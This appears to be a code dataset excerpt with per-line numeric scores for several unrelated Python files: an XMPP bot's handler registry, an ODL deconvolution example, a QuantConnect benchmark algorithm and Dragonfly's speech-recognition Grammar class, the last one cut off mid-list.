[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0.009523809523809525, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0.011494252873563218, 0, 0.008928571428571428, 0, 0, 0, 0, 0.01020408163265306, 0, 0, 0, 0.009523809523809525, 0 ]
42
0.001743
false
# -*- coding: utf-8 -*- ################################################################################ COMMANDS = {} COMMAND_HANDLERS = {} MESSAGE_HANDLERS = [] PRESENCE_HANDLERS = [] IQ_HANDLERS = [] JOIN_HANDLERS = [] LEAVE_HANDLERS = [] ### HANDLERS REGISTERING ####################################################### def register_message_handler(instance): MESSAGE_HANDLERS.append(instance) def register_presence_handler(instance): PRESENCE_HANDLERS.append(instance) def register_iq_handler(instance): IQ_HANDLERS.append(instance) def register_join_handler(instance): JOIN_HANDLERS.append(instance) def register_leave_handler(instance): LEAVE_HANDLERS.append(instance) def register_command_handler(instance, cmd, ctg=[], dsc='', syn='', acs=1, pub=None): # (handler, команда, категории, описание, синтаксис, доступ, флаг "используется в ростере") log(u'\t' + cmd) COMMAND_HANDLERS[cmd] = instance COMMANDS[cmd] = {'ctg': ctg, 'dsc': dsc, 'syn': syn, 'acs': acs, 'pub': pub} ### HANDLERS CALLING ########################################################### def call_message_handlers(t, s, b): for handler in MESSAGE_HANDLERS: with instance_control: threading.Thread(None, handler, 'msg_' + str(random.randrange(0,999)), (t, s, b,)).start() def call_presence_handlers(prs): for handler in PRESENCE_HANDLERS: with instance_control: threading.Thread(None, handler, 'prs_' + str(random.randrange(0,999)), (prs,)).start() def call_iq_handlers(iq): print 'call_iq' for handler in IQ_HANDLERS: with instance_control: threading.Thread(None, handler, 'iq_' + str(random.randrange(0,999)), (iq,)).start() def call_join_handlers(jid, muc, nick, afl, role): print 'call_join' for handler in JOIN_HANDLERS: with instance_control: threading.Thread(None, handler, 'join_' + str(random.randrange(0,999)), (jid, muc, nick, afl, role,)).start() def call_leave_handlers(jid, muc, nick, afl, role): log('call_leave') for handler in LEAVE_HANDLERS: with instance_control: threading.Thread(None, handler, 'leave_' + 
str(random.randrange(0,999)), (jid, muc, nick, afl, role,)).start() def call_command_handlers(cmd, t, s, p): muc = s[1] if is_muc(muc): if cmd in (load_option(muc, 'disabled') or []): # если команда находится в отключенных with instance_control: threading.Thread(None, reply, 'cmd_' + str(random.randrange(0,999)), (t, s, core_cmd_disabled_msg % cmd,)).start() return else: if not COMMANDS[cmd]['pub']: # если команда только для конференций with instance_control: threading.Thread(None, reply, 'cmd_' + str(random.randrange(0,999)), (t, s, core_muc_only_msg,)).start() return with instance_control: threading.Thread(None, COMMAND_HANDLERS[cmd], 'cmd_' + str(random.randrange(0,999)), (t, s, p,)).start()
[ "# -*- coding: utf-8 -*-\r\n", "\r\n", "################################################################################\r\n", "\r\n", "COMMANDS = {}\r\n", "\r\n", "COMMAND_HANDLERS = {}\r\n", "MESSAGE_HANDLERS = []\r\n", "PRESENCE_HANDLERS = []\r\n", "IQ_HANDLERS = []\r\n", "JOIN_HANDLERS = []\r\n", "LEAVE_HANDLERS = []\r\n", "\r\n", "### HANDLERS REGISTERING #######################################################\r\n", "\r\n", "def register_message_handler(instance):\r\n", " MESSAGE_HANDLERS.append(instance)\r\n", "\r\n", "\r\n", "\r\n", "def register_presence_handler(instance):\r\n", " PRESENCE_HANDLERS.append(instance)\r\n", "\r\n", "\r\n", "\r\n", "def register_iq_handler(instance):\r\n", " IQ_HANDLERS.append(instance)\r\n", "\r\n", "\r\n", "\r\n", "def register_join_handler(instance):\r\n", " JOIN_HANDLERS.append(instance)\r\n", "\r\n", "\r\n", "\r\n", "def register_leave_handler(instance):\r\n", " LEAVE_HANDLERS.append(instance)\r\n", "\r\n", "\r\n", "\r\n", "def register_command_handler(instance, cmd, ctg=[], dsc='', syn='', acs=1, pub=None):\r\n", "# (handler, команда, категории, описание, синтаксис, доступ, флаг \"используется в ростере\")\r\n", " log(u'\\t' + cmd)\r\n", " COMMAND_HANDLERS[cmd] = instance\r\n", " COMMANDS[cmd] = {'ctg': ctg, 'dsc': dsc, 'syn': syn, 'acs': acs, 'pub': pub}\r\n", "\r\n", "### HANDLERS CALLING ###########################################################\r\n", "\r\n", "def call_message_handlers(t, s, b):\r\n", " for handler in MESSAGE_HANDLERS:\r\n", " with instance_control:\r\n", " threading.Thread(None, handler, 'msg_' + str(random.randrange(0,999)), (t, s, b,)).start()\r\n", "\r\n", "\r\n", "\r\n", "def call_presence_handlers(prs):\r\n", " for handler in PRESENCE_HANDLERS:\r\n", " with instance_control:\r\n", " threading.Thread(None, handler, 'prs_' + str(random.randrange(0,999)), (prs,)).start()\r\n", "\r\n", "\r\n", "\r\n", "def call_iq_handlers(iq):\r\n", " print 'call_iq'\r\n", " for handler in IQ_HANDLERS:\r\n", " 
with instance_control:\r\n", " threading.Thread(None, handler, 'iq_' + str(random.randrange(0,999)), (iq,)).start()\r\n", "\r\n", "\r\n", "\r\n", "def call_join_handlers(jid, muc, nick, afl, role):\r\n", " print 'call_join'\r\n", " for handler in JOIN_HANDLERS:\r\n", " with instance_control:\r\n", " threading.Thread(None, handler, 'join_' + str(random.randrange(0,999)), (jid, muc, nick, afl, role,)).start()\r\n", "\r\n", "\r\n", "\r\n", "def call_leave_handlers(jid, muc, nick, afl, role):\r\n", " log('call_leave')\r\n", " for handler in LEAVE_HANDLERS:\r\n", " with instance_control:\r\n", " threading.Thread(None, handler, 'leave_' + str(random.randrange(0,999)), (jid, muc, nick, afl, role,)).start()\r\n", "\r\n", "\r\n", "\r\n", "def call_command_handlers(cmd, t, s, p):\r\n", " muc = s[1]\r\n", "\r\n", " if is_muc(muc):\r\n", " if cmd in (load_option(muc, 'disabled') or []):\t\t# если команда находится в отключенных\r\n", " with instance_control:\r\n", " threading.Thread(None, reply, 'cmd_' + str(random.randrange(0,999)), (t, s, core_cmd_disabled_msg % cmd,)).start()\r\n", " return\r\n", "\r\n", " else:\r\n", " if not COMMANDS[cmd]['pub']:\t\t\t# если команда только для конференций\r\n", " with instance_control:\r\n", " threading.Thread(None, reply, 'cmd_' + str(random.randrange(0,999)), (t, s, core_muc_only_msg,)).start()\r\n", " return\r\n", "\r\n", " with instance_control:\r\n", " threading.Thread(None, COMMAND_HANDLERS[cmd], 'cmd_' + str(random.randrange(0,999)), (t, s, p,)).start()\r\n" ]
[ 0, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0, 0.024390243902439025, 0.027777777777777776, 0, 0, 0, 0.023809523809523808, 0.02702702702702703, 0, 0, 0, 0.027777777777777776, 0.03225806451612903, 0, 0, 0, 0.02631578947368421, 0.030303030303030304, 0, 0, 0, 0.02564102564102564, 0.029411764705882353, 0, 0, 0, 0.022988505747126436, 0.021505376344086023, 0.05263157894736842, 0.02857142857142857, 0.012658227848101266, 0, 0.024390243902439025, 0, 0.02702702702702703, 0.02857142857142857, 0.038461538461538464, 0.031578947368421054, 0, 0, 0, 0.029411764705882353, 0.027777777777777776, 0.038461538461538464, 0.03296703296703297, 0, 0, 0, 0.037037037037037035, 0.05555555555555555, 0.03333333333333333, 0.038461538461538464, 0.033707865168539325, 0, 0, 0, 0.019230769230769232, 0.05, 0.03125, 0.038461538461538464, 0.02631578947368421, 0, 0, 0, 0.018867924528301886, 0.05, 0.030303030303030304, 0.038461538461538464, 0.02608695652173913, 0, 0, 0, 0.023809523809523808, 0.07692307692307693, 0, 0.05555555555555555, 0.02197802197802198, 0.037037037037037035, 0.016666666666666666, 0, 0, 0.125, 0.013888888888888888, 0.037037037037037035, 0.01818181818181818, 0, 0, 0.04, 0.027777777777777776 ]
103
0.016983
false
"""Example of a deconvolution problem with different solvers (CPU).""" import numpy as np import matplotlib.pyplot as plt from scipy import ndimage import odl class Convolution(odl.Operator): def __init__(self, kernel, adjkernel=None): self.kernel = kernel self.adjkernel = (adjkernel if adjkernel is not None else kernel.space.element(kernel[::-1].copy())) self.norm = float(np.sum(np.abs(self.kernel.ntuple))) odl.Operator.__init__(self, domain=kernel.space, range=kernel.space, linear=True) def _call(self, rhs, out): ndimage.convolve(rhs.ntuple.data, self.kernel.ntuple.data, output=out.ntuple.data, mode='wrap') @property def adjoint(self): return Convolution(self.adjkernel, self.kernel) def opnorm(self): return self.norm # Discretization discr_space = odl.uniform_discr(0, 10, 500, impl='numpy') # Complicated functions to check performance kernel = discr_space.element(lambda x: np.exp(x / 2) * np.cos(x * 1.172)) phantom = discr_space.element(lambda x: x ** 2 * np.sin(x) ** 2 * (x > 5)) # Create operator conv = Convolution(kernel) # Dampening parameter for landweber iterations = 100 omega = 1 / conv.opnorm() ** 2 # Display callback def callback(x): plt.plot(conv(x)) # Test CGN plt.figure() plt.plot(phantom) odl.solvers.conjugate_gradient_normal(conv, discr_space.zero(), phantom, iterations, callback) # Landweber plt.figure() plt.plot(phantom) odl.solvers.landweber(conv, discr_space.zero(), phantom, iterations, omega, callback) plt.show()
[ "\"\"\"Example of a deconvolution problem with different solvers (CPU).\"\"\"\n", "\n", "import numpy as np\n", "import matplotlib.pyplot as plt\n", "from scipy import ndimage\n", "import odl\n", "\n", "\n", "class Convolution(odl.Operator):\n", " def __init__(self, kernel, adjkernel=None):\n", " self.kernel = kernel\n", " self.adjkernel = (adjkernel if adjkernel is not None\n", " else kernel.space.element(kernel[::-1].copy()))\n", " self.norm = float(np.sum(np.abs(self.kernel.ntuple)))\n", " odl.Operator.__init__(self, domain=kernel.space, range=kernel.space,\n", " linear=True)\n", "\n", " def _call(self, rhs, out):\n", " ndimage.convolve(rhs.ntuple.data, self.kernel.ntuple.data,\n", " output=out.ntuple.data, mode='wrap')\n", "\n", " @property\n", " def adjoint(self):\n", " return Convolution(self.adjkernel, self.kernel)\n", "\n", " def opnorm(self):\n", " return self.norm\n", "\n", "# Discretization\n", "discr_space = odl.uniform_discr(0, 10, 500, impl='numpy')\n", "\n", "# Complicated functions to check performance\n", "kernel = discr_space.element(lambda x: np.exp(x / 2) * np.cos(x * 1.172))\n", "phantom = discr_space.element(lambda x: x ** 2 * np.sin(x) ** 2 * (x > 5))\n", "\n", "# Create operator\n", "conv = Convolution(kernel)\n", "\n", "# Dampening parameter for landweber\n", "iterations = 100\n", "omega = 1 / conv.opnorm() ** 2\n", "\n", "\n", "# Display callback\n", "def callback(x):\n", " plt.plot(conv(x))\n", "\n", "# Test CGN\n", "plt.figure()\n", "plt.plot(phantom)\n", "odl.solvers.conjugate_gradient_normal(conv, discr_space.zero(), phantom,\n", " iterations, callback)\n", "\n", "# Landweber\n", "plt.figure()\n", "plt.plot(phantom)\n", "odl.solvers.landweber(conv, discr_space.zero(), phantom,\n", " iterations, omega, callback)\n", "\n", "plt.show()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.017241379310344827, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
60
0.001569
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System") AddReference("QuantConnect.Algorithm") AddReference("QuantConnect.Indicators") AddReference("QuantConnect.Common") from System import * from QuantConnect import * from QuantConnect.Data import * from QuantConnect.Algorithm import * from QuantConnect.Indicators import * class HistoryRequestBenchmark(QCAlgorithm): def Initialize(self): self.SetStartDate(2010, 1, 1) self.SetEndDate(2018, 1, 1) self.SetCash(10000) self.symbol = self.AddEquity("SPY").Symbol def OnEndOfDay(self): minuteHistory = self.History([self.symbol], 60, Resolution.Minute) lastHourHigh = 0 for index, row in minuteHistory.loc["SPY"].iterrows(): if lastHourHigh < row["high"]: lastHourHigh = row["high"] dailyHistory = self.History([self.symbol], 1, Resolution.Daily).loc["SPY"].head() dailyHistoryHigh = dailyHistory["high"] dailyHistoryLow = dailyHistory["low"] dailyHistoryOpen = dailyHistory["open"]
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "AddReference(\"QuantConnect.Indicators\")\n", "AddReference(\"QuantConnect.Common\")\n", "\n", "from System import *\n", "from QuantConnect import *\n", "from QuantConnect.Data import *\n", "from QuantConnect.Algorithm import *\n", "from QuantConnect.Indicators import *\n", "\n", "class HistoryRequestBenchmark(QCAlgorithm):\n", "\n", " def Initialize(self):\n", " self.SetStartDate(2010, 1, 1)\n", " self.SetEndDate(2018, 1, 1)\n", " self.SetCash(10000)\n", " self.symbol = self.AddEquity(\"SPY\").Symbol\n", "\n", " def OnEndOfDay(self):\n", " minuteHistory = self.History([self.symbol], 60, Resolution.Minute)\n", " lastHourHigh = 0\n", " for index, row in minuteHistory.loc[\"SPY\"].iterrows():\n", " if lastHourHigh < row[\"high\"]:\n", " lastHourHigh = row[\"high\"]\n", "\n", " dailyHistory = self.History([self.symbol], 1, Resolution.Daily).loc[\"SPY\"].head()\n", " dailyHistoryHigh = dailyHistory[\"high\"]\n", " dailyHistoryLow = dailyHistory[\"low\"]\n", " dailyHistoryOpen = dailyHistory[\"open\"]" ]
[ 0, 0.012345679012345678, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.037037037037037035, 0.03125, 0.02702702702702703, 0.02631578947368421, 0, 0.022727272727272728, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0, 0, 0.02127659574468085 ]
44
0.005647
false
# # This file is part of Dragonfly. # (c) Copyright 2007, 2008 by Christo Butcher # Licensed under the LGPL. # # Dragonfly is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Dragonfly is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with Dragonfly. If not, see # <http://www.gnu.org/licenses/>. # """ Grammar class ============================================================================ """ import logging from six import string_types from ..engines import get_engine from .rule_base import Rule from .list import ListBase from .context import Context from ..error import GrammarError # -------------------------------------------------------------------------- class Grammar(object): """ Grammar class for managing a set of rules. This base grammar class takes care of the communication between Dragonfly's object model and the backend speech recognition engine. This includes compiling rules and elements, loading them, activating and deactivating them, and unloading them. It may, depending on the engine, also include receiving recognition results and dispatching them to the appropriate rule. - *name* -- name of this grammar - *description* (str, default: None) -- description for this grammar - *context* (Context, default: None) -- context within which to be active. If *None*, the grammar will always be active. 
""" # pylint: disable=too-many-instance-attributes _log_load = logging.getLogger("grammar.load") _log_begin = logging.getLogger("grammar.begin") _log_results = logging.getLogger("grammar.results") _log = logging.getLogger("grammar") # ---------------------------------------------------------------------- # Methods for initialization and cleanup. def __init__(self, name, description=None, context=None, engine=None): self._name = name self._description = description if not (isinstance(context, Context) or context is None): raise TypeError("context must be either a Context object or " "None") self._context = context if engine: self._engine = engine else: self._engine = get_engine() self._rules = [] self._lists = [] self._rule_names = None self._loaded = False self._enabled = True self._in_context = False def __del__(self): try: if self._loaded: return self.unload() except Exception as e: try: self._log.exception("Exception during grammar unloading:" " %s", e) except Exception as e: pass # ---------------------------------------------------------------------- # Methods for runtime introspection. def __repr__(self): return "%s(%s)" % (self.__class__.__name__, self._name) name = property(lambda self: self._name, doc="A grammar's name.") rules = property(lambda self: tuple(self._rules), doc="List of a grammar's rules.") active_rules = property( lambda self: [r for r in self.rules if r.active], doc="List of a grammar's active rules." ) lists = property(lambda self: tuple(self._lists), doc="List of a grammar's lists.") loaded = property(lambda self: self._loaded, doc="Whether a grammar is loaded into" " its SR engine or not.") @property def rule_names(self): """ List of grammar's rule names. """ result = [] for rule in self._rules: result.append(rule.name) return result def enable(self): """ Enable this grammar so that it is active to receive recognitions. """ self._enabled = True def disable(self): """ Disable this grammar so that it is not active to receive recognitions. 
""" self._enabled = False enabled = property(lambda self: self._enabled, doc="Whether a grammar is active to receive " "recognitions or not.") def set_exclusiveness(self, exclusive): """ Set the exclusiveness of this grammar. """ self._engine.set_exclusiveness(self, exclusive) def set_exclusive(self, exclusive): """ Alias of :meth:`set_exclusiveness`. """ self.set_exclusiveness(exclusive) def _set_engine(self, engine): if self._loaded: raise GrammarError(" Grammar %s: Cannot set engine while " "loaded." % self) self._engine = engine engine = property(lambda self: self._engine, _set_engine, doc="A grammar's SR engine.") def set_context(self, context): """ Set the context for this grammar, under which it and its rules will be active and receive recognitions if it is also enabled. Use of this method overwrites any previous context. Contexts can be modified at any time, but will only be checked when :meth:`process_begin` is called. :param context: context within which to be active. If *None*, the grammar will always be active. :type context: Context|None """ if not (isinstance(context, Context) or context is None): raise TypeError("context must be either a Context object or " "None") self._context = context context = property(lambda self: self._context, doc="A grammar's context, under which it and its " "rules will be active and receive recognitions " "if it is also enabled.") # ---------------------------------------------------------------------- # Methods for populating a grammar object instance. def add_rule(self, rule): """ Add a rule to this grammar. The following rules apply when adding rules into grammars: #. Rules **cannot** be added to grammars that are currently loaded. #. Two or more rules with the same name are **not** allowed. .. warning:: Note that while adding the same ``Rule`` object to more than one grammar is allowed, it is **not** recommended! This is because the context and active/enabled states of these rules will not function correctly if used. 
It is better to use *separate* ``Rule`` instances for each grammar instead. :param rule: Dragonfly rule :type rule: Rule """ self._log_load.debug("Grammar %s: adding rule %s.", self._name, rule.name) # Check for correct type and duplicate rules or rule names. if self._loaded: raise GrammarError("Cannot add rule while loaded.") elif not isinstance(rule, Rule): raise GrammarError("Invalid rule object: %s" % rule) elif rule in self._rules: return elif rule.imported: return elif [True for r in self._rules if r.name == rule.name]: raise GrammarError("Two rules with the same name '%s' not" " allowed." % rule.name) elif rule.grammar is not None and rule.exported: self._log_load.warning("Exported rule %s is already in grammar " "%s, adding it to grammar %s is not " "recommended.", rule.name, rule.grammar.name, self._name) # Append the rule to this grammar object's internal list. self._rules.append(rule) rule.grammar = self def remove_rule(self, rule): """ Remove a rule from this grammar. Rules **cannot** be removed from grammars that are currently loaded. :param rule: Dragonfly rule :type rule: Rule """ self._log_load.debug("Grammar %s: removing rule %s.", self._name, rule.name) # Check for correct type. if self._loaded: raise GrammarError("Cannot remove rule while loaded.") elif not isinstance(rule, Rule): raise GrammarError("Invalid rule object: %s" % rule) elif rule not in self._rules: return # Remove the rule from this grammar object's internal list. self._rules.remove(rule) rule.grammar = None def add_list(self, lst): """ Add a list to this grammar. Lists **cannot** be added to grammars that are currently loaded. :param lst: Dragonfly list :type lst: ListBase """ self._log_load.debug("Grammar %s: adding list %s.", self._name, lst.name) # Make sure that the list can be loaded and is not a duplicate. 
if self._loaded: raise GrammarError("Cannot add list while loaded.") elif not isinstance(lst, ListBase): raise GrammarError("Invalid list object: %s" % lst) for l in self._lists: if l.name == lst.name: if l is lst: # This list was already added previously, so ignore. return raise GrammarError("Two lists with the same name '%s' not" " allowed." % lst.name) # Append the list to this grammar object's internal list. self._lists.append(lst) lst.grammar = self def remove_list(self, lst): """ Remove a list from this grammar. Lists **cannot** be removed from grammars that are currently loaded. :param lst: Dragonfly list :type lst: ListBase """ self._log_load.debug("Grammar %s: removing list %s.", self._name, lst.name) # Check for correct type. if self._loaded: raise GrammarError("Cannot remove list while loaded.") elif not isinstance(lst, ListBase): raise GrammarError("Invalid list object: %s" % lst) elif lst.name not in [l.name for l in self._lists]: return # Remove the list from this grammar object's internal list. self._lists.remove(lst) lst.grammar = None def add_dependency(self, dep): """ Add a rule or list dependency to this grammar. **Internal:** this method is normally *not* called by the user, but instead automatically during grammar compilation. """ if isinstance(dep, Rule): self.add_rule(dep) elif isinstance(dep, ListBase): self.add_list(dep) else: raise GrammarError("Unknown dependency type %s." % dep) def add_all_dependencies(self): """ Iterate through the grammar's rules and add all the necessary dependencies. **Internal** This method is called when the grammar is loaded. """ memo = set() for r in self._rules: for d in r.dependencies(memo): self.add_dependency(d) # ---------------------------------------------------------------------- # Methods for runtime modification of a grammar's contents. def activate_rule(self, rule): """ Activate a rule loaded in this grammar. 
**Internal:** this method is normally *not* called directly by the user, but instead automatically when the rule itself is activated by the user. """ self._log_load.debug("Grammar %s: activating rule %s.", self._name, rule.name) # Check for correct type and valid rule instance. assert self._loaded assert isinstance(rule, Rule), \ "Dragonfly rule objects must be of the type dragonfly.rule.Rule" if rule not in self._rules: raise GrammarError("Rule '%s' not loaded in this grammar." % rule.name) if not rule.exported: return # Activate the given rule. self._engine.activate_rule(rule, self) def deactivate_rule(self, rule): """ Deactivate a rule loaded in this grammar. **Internal:** this method is normally *not* called directly by the user, but instead automatically when the rule itself is deactivated by the user. """ self._log_load.debug("Grammar %s: deactivating rule %s.", self._name, rule.name) # Check for correct type and valid rule instance. assert self._loaded assert isinstance(rule, Rule), \ "Dragonfly rule objects must be of the type dragonfly.rule.Rule" if rule not in self._rules: raise GrammarError("Rule '%s' not loaded in this grammar." % rule.name) if not rule.exported: return # Deactivate the given rule. self._engine.deactivate_rule(rule, self) def update_list(self, lst): """ Update a list's content loaded in this grammar. **Internal:** this method is normally *not* called directly by the user, but instead automatically when the list itself is modified by the user. """ self._log_load.debug("Grammar %s: updating list %s.", self._name, lst.name) # Check for correct type and valid list instance. # assert self._loaded if lst not in self._lists: raise GrammarError("List '%s' not loaded in this grammar." % lst.name) elif [True for w in lst.get_list_items() if not isinstance(w, string_types)]: raise GrammarError("List '%s' contains objects other than" "strings." 
% lst.name) self._engine.update_list(lst, self) # ---------------------------------------------------------------------- # Methods for registering a grammar object instance in natlink. def load(self): """ Load this grammar into its SR engine. """ self._log_load.debug("Grammar %s: loading into engine %s.", self._name, self._engine) # Prevent loading the same grammar multiple times. if self._loaded: return self.add_all_dependencies() self._engine.load_grammar(self) self._loaded = True self._in_context = False # Update all rules loaded in this grammar. for rule in self._rules: # Explicitly compare to False so that uninitialized rules (which # have active set to None) are activated. if rule.active is not False: rule.activate(force=True) # Update all lists loaded in this grammar. for lst in self._lists: # pylint: disable=protected-access lst._update() # self._log_load.warning(self.get_complexity_string()) def unload(self): """ Unload this grammar from its SR engine. """ # Prevent unloading the same grammar multiple times. if not self._loaded: return self._log_load.debug("Grammar %s: unloading.", self._name) self._engine.unload_grammar(self) self._loaded = False self._in_context = False def get_complexity_string(self): """ Build and return a human-readable text giving insight into the complexity of this grammar. 
""" rules_all = self.rules rules_top = [r for r in self.rules if r.exported] rules_imp = [r for r in self.rules if r.imported] elements = [] for rule in rules_all: elements.extend(self._get_element_list(rule)) text = ("Grammar: %3d (%3d, %3d) rules, %4d elements (%3d avg) %s" % ( len(rules_all), len(rules_top), len(rules_imp), len(elements), len(elements) / len(rules_all), self, ) ) for rule in rules_all: elements = self._get_element_list(rule) text += "\n Rule: %4d %s" % (len(elements), rule) return text def _get_element_list(self, thing): if isinstance(thing, Rule): element = thing.element else: element = thing elements = [element] for child in element.children: elements.extend(self._get_element_list(child)) return elements # ---------------------------------------------------------------------- # Callback methods for handling utterances and recognitions. def process_begin(self, executable, title, handle): """ Start of phrase callback. *Usually derived grammar classes override ``Grammar._process_begin`` instead of this method, because this method merely wraps that method adding context matching.* This method is called when the speech recognition engine detects that the user has begun to speak a phrase. Arguments: - *executable* -- the full path to the module whose window is currently in the foreground. - *title* -- window title of the foreground window. - *handle* -- window handle to the foreground window. """ # pylint: disable=expression-not-assigned self._log_begin.debug("Grammar %s: detected beginning of " "utterance.", self._name) self._log_begin.debug("Grammar %s: executable '%s', title '%s'.", self._name, executable, title) if not self._enabled: # Grammar is disabled, so deactivate all active rules. [r.deactivate() for r in self._rules if r.active] elif not self._context \ or self._context.matches(executable, title, handle): # Grammar is within context. 
if not self._in_context: self._in_context = True self.enter_context() self._process_begin(executable, title, handle) for r in self._rules: if r.exported and hasattr(r, "process_begin"): r.process_begin(executable, title, handle) else: # Grammar's context doesn't match, deactivate active rules. if self._in_context: self._in_context = False self.exit_context() [r.deactivate() for r in self._rules if r.active] self._log_begin.debug("Grammar %s: active rules: %s.", self._name, [r.name for r in self._rules if r.active]) def enter_context(self): """ Enter context callback. This method is called when a phrase-start has been detected. It is only called if this grammar's context previously did not match but now does match positively. """ def exit_context(self): """ Exit context callback. This method is called when a phrase-start has been detected. It is only called if this grammar's context previously did match but now doesn't match positively anymore. """ def _process_begin(self, executable, title, handle): """ Start of phrase callback. *This usually is the method which should be overridden to give derived grammar classes custom behavior.* This method is called when the speech recognition engine detects that the user has begun to speak a phrase. This method is called by the ``Grammar.process_begin`` method only if this grammar's context matches positively. Arguments: - *executable* -- the full path to the module whose window is currently in the foreground. - *title* -- window title of the foreground window. - *handle* -- window handle to the foreground window. """
[ "#\n", "# This file is part of Dragonfly.\n", "# (c) Copyright 2007, 2008 by Christo Butcher\n", "# Licensed under the LGPL.\n", "#\n", "# Dragonfly is free software: you can redistribute it and/or modify it\n", "# under the terms of the GNU Lesser General Public License as published\n", "# by the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "#\n", "# Dragonfly is distributed in the hope that it will be useful, but\n", "# WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n", "# Lesser General Public License for more details.\n", "#\n", "# You should have received a copy of the GNU Lesser General Public\n", "# License along with Dragonfly. If not, see\n", "# <http://www.gnu.org/licenses/>.\n", "#\n", "\n", "\"\"\"\n", "Grammar class\n", "============================================================================\n", "\n", "\"\"\"\n", "\n", "import logging\n", "from six import string_types\n", "\n", "from ..engines import get_engine\n", "from .rule_base import Rule\n", "from .list import ListBase\n", "from .context import Context\n", "from ..error import GrammarError\n", "\n", "\n", "# --------------------------------------------------------------------------\n", "\n", "class Grammar(object):\n", " \"\"\"\n", " Grammar class for managing a set of rules.\n", "\n", " This base grammar class takes care of the communication\n", " between Dragonfly's object model and the backend speech\n", " recognition engine. This includes compiling rules and\n", " elements, loading them, activating and deactivating\n", " them, and unloading them. 
It may, depending on the\n", " engine, also include receiving recognition results and\n", " dispatching them to the appropriate rule.\n", "\n", " - *name* -- name of this grammar\n", " - *description* (str, default: None) --\n", " description for this grammar\n", " - *context* (Context, default: None) --\n", " context within which to be active. If *None*, the grammar will\n", " always be active.\n", "\n", " \"\"\"\n", "\n", " # pylint: disable=too-many-instance-attributes\n", " _log_load = logging.getLogger(\"grammar.load\")\n", " _log_begin = logging.getLogger(\"grammar.begin\")\n", " _log_results = logging.getLogger(\"grammar.results\")\n", " _log = logging.getLogger(\"grammar\")\n", "\n", " # ----------------------------------------------------------------------\n", " # Methods for initialization and cleanup.\n", "\n", " def __init__(self, name, description=None, context=None, engine=None):\n", " self._name = name\n", " self._description = description\n", " if not (isinstance(context, Context) or context is None):\n", " raise TypeError(\"context must be either a Context object or \"\n", " \"None\")\n", " self._context = context\n", "\n", " if engine:\n", " self._engine = engine\n", " else:\n", " self._engine = get_engine()\n", "\n", " self._rules = []\n", " self._lists = []\n", " self._rule_names = None\n", " self._loaded = False\n", " self._enabled = True\n", " self._in_context = False\n", "\n", " def __del__(self):\n", " try:\n", " if self._loaded:\n", " return\n", " self.unload()\n", " except Exception as e:\n", " try:\n", " self._log.exception(\"Exception during grammar unloading:\"\n", " \" %s\", e)\n", " except Exception as e:\n", " pass\n", "\n", " # ----------------------------------------------------------------------\n", " # Methods for runtime introspection.\n", "\n", " def __repr__(self):\n", " return \"%s(%s)\" % (self.__class__.__name__, self._name)\n", "\n", " name = property(lambda self: self._name,\n", " doc=\"A grammar's name.\")\n", "\n", " 
